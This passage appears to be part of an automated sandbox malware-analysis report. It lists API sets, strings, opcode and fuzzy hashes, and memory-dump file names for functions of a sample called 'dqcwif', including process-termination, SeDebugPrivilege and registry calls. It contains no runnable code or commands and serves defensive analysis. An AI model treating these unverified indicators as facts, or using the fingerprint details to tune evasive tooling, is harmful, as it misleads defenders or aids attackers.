                                                                                                          • Instruction ID: 2a02cb0988097ed6730c6cf26375670aad4ab34ecd3d8860dc96bded3702efb8
                                                                                                          • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                                          • Instruction Fuzzy Hash: 4E414D76B08A4695EB109B69D4A05EC37B1FB8AF94F444432CB0D837AEDF38E995C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadMessageModuleStringwprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                          • API String ID: 4007322891-4153970271
                                                                                                          • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                          • Instruction ID: c5154144e3295f01950303ea6928c3f7438959d6cd5d567eb4d091645810faee
                                                                                                          • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                                                                          • Instruction Fuzzy Hash: 3B314D36A18A8291EB10DB29E8615F96760FF96F84F904032EB4D8369FDF7DE905C740
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 2573188126-1403004172
                                                                                                          • Opcode ID: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                          • Instruction ID: 48b6e959c3d638c37bbc18ea46b20115efacc39a35e506289910cdfae4da4ffa
                                                                                                          • Opcode Fuzzy Hash: 69a74828d989a32538d8bf5129078fe410d4974b60f3824db6dc34d50caf6ec7
                                                                                                          • Instruction Fuzzy Hash: 7931A635B08B4582FA10AB19E8255F96361FF8AFE0F444231DBAD877DBCE2CE9058750
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 2573188126-1403004172
                                                                                                          • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                                          • Instruction ID: fb94cf34db03f9b1b4638df830a46efde8e5b050a7100fd7cb82096389cb002a
                                                                                                          • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                                                                          • Instruction Fuzzy Hash: 5031CD35B08B8282FB109B19E8655F96361BF8AFE0F444131DB9D877DBDE2CE9098750
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                          • Instruction ID: 705e0c675112bbb471c326cfdc54a7c1f9fff74f12080dc3b3ec69ec92c910aa
                                                                                                          • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                                                          • Instruction Fuzzy Hash: F1316425F0C61286FB618B2DA86467973A2AB56F50F144038CE0EC779FDE3DEC958B00
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 685491774-0
                                                                                                          • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                                          • Instruction ID: a220ef4314cacfefe9318ac9e0f79b5aacffe79d54d4b2277cc4f493d71ed096
                                                                                                          • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                                                          • Instruction Fuzzy Hash: 7411A535B4850342F7049B6AE868DAD2261AFCEF80F505034CB1ECBBDADE3DE8548350
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                          • API String ID: 0-1603158881
                                                                                                          • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                          • Instruction ID: f8773673536c54fcf8cda25e4942005d9aa01a6f6a2b2b22468bcfb8522567ea
                                                                                                          • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                                                          • Instruction Fuzzy Hash: 5512B562B1968392FE688B2DC8312F96291BF56F84F845531DB1DC629BEF3CED45C201
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Init$Clear
                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                          • API String ID: 3467423407-1765764032
                                                                                                          • Opcode ID: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                                          • Instruction ID: 08d0eec27716f8d8e1d87dd6e3267e4348a437d0448068380e0c4ca0154ab39c
                                                                                                          • Opcode Fuzzy Hash: 0d292a3f0f15bdf0dc2b489c3a05645491a3d66a64ca4070d3452dd040457e0f
                                                                                                          • Instruction Fuzzy Hash: 92A19E36A08B4196EB20DF6AD4905ED67A0FB89F98F440132DB8D8379ADFBCD845C740
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                                          • String ID: -----$SysListView32
                                                                                                          • API String ID: 2361508679-3975388722
                                                                                                          • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                          • Instruction ID: d7db5a0b8232a755dfe2c773d16dae64dcebc681bbcfd49314bc664f679d4fea
                                                                                                          • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                                          • Instruction Fuzzy Hash: 3C51B236A047918AE720CF69D8546D933A1FB89B84F40413ADF4D87B9ACF38D994CB40
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                          • API String ID: 2019164449-3381328864
                                                                                                          • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                          • Instruction ID: 2951fa09eb3a120dea0a8c87bbfda663af992b1277fab5243534a46e10116075
                                                                                                          • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                                          • Instruction Fuzzy Hash: A0214F21B1C603D0FA609719E9656F92360AF8BFC4F409035DB0DC769BEE2CED568701
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 3210457359-0
                                                                                                          • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                          • Instruction ID: 0e46e66b2ced905aa123abc4055f76c947ef04bcb60dfbd361db7c86daa7319f
                                                                                                          • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                                          • Instruction Fuzzy Hash: EE618D25A1854386FB349B2998657FA2661AF92FA4F108131DB2DC3ADFCF7DEC419304
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                          • Instruction ID: 5160a177ce0c939e2b9c11b2abe03f388adbdfe9cf299e5bc0b03aab620bba6f
                                                                                                          • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                          • Instruction Fuzzy Hash: 11213972959B8182E710CF56E4587AAB7A0F78AFDAF044125DB8D03BA9CF7DD5488B00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                          • String ID: SeDebugPrivilege
                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                          • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                          • Instruction ID: 632d26610ad4eaeb308c8aaa9635b05627a131be5e4d7b7672e1c36cdc22e92d
                                                                                                          • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                                          • Instruction Fuzzy Hash: 05516262A0864286EB14EB2DD4A03FC6B60FF86F95F058431D70E876ABDF7DE9458710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                          • String ID: 2$P
                                                                                                          • API String ID: 93392585-1110268094
                                                                                                          • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                          • Instruction ID: bb8216f95ac8f070d10ac2e08a5de6ab2b9f183cba6f018232842d4d54d67554
                                                                                                          • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                                          • Instruction Fuzzy Hash: 5B51C132A0869289F7248F69E4602FD77A1BB63F58F644135CB5D936DBCF38E8818700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$LongMessageSend$Show
                                                                                                          • String ID: '
                                                                                                          • API String ID: 257662517-1997036262
                                                                                                          • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                          • Instruction ID: a3aed234ad3ef2e28c20c0e38c023595e305686cdc28ae3acab964bbda53182b
                                                                                                          • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                                          • Instruction Fuzzy Hash: 0C51E53290865281E3669B6D9464AFD2761EBCAF90F544131CF5E8379ACF3CFC528304
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                          • API String ID: 4051287042-3128320259
                                                                                                          • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                          • Instruction ID: 1310ba515496feff42423db3808f6ccbf96643a49a1e11754691b63411771363
                                                                                                          • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                                          • Instruction Fuzzy Hash: 00115271718B8591E7308B14F454BEA2360FB9AB45F845036DB4E8369EDE7CC945C740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1211466189-0
                                                                                                          • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                                          • Instruction ID: 24d5b2d778c4e83528760b207247739f9b75c51a7e9f83f27fefb94cd39976fc
                                                                                                          • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                                          • Instruction Fuzzy Hash: 6AA1043675869292EB688F299164BB9B7A1FB45F84F105035DF0A83ADACF3DEC518700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 50796853-0
                                                                                                          • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                          • Instruction ID: 52a225c81c5580b9cfae91ebdf273653db63be148cad4fdb48bcc4b1108f247b
                                                                                                          • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                                          • Instruction Fuzzy Hash: 9DB13D72A08A8286EB10EB69D4A13FC2760EB86B84F014531DB4D97A9BCF7DD905C754
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
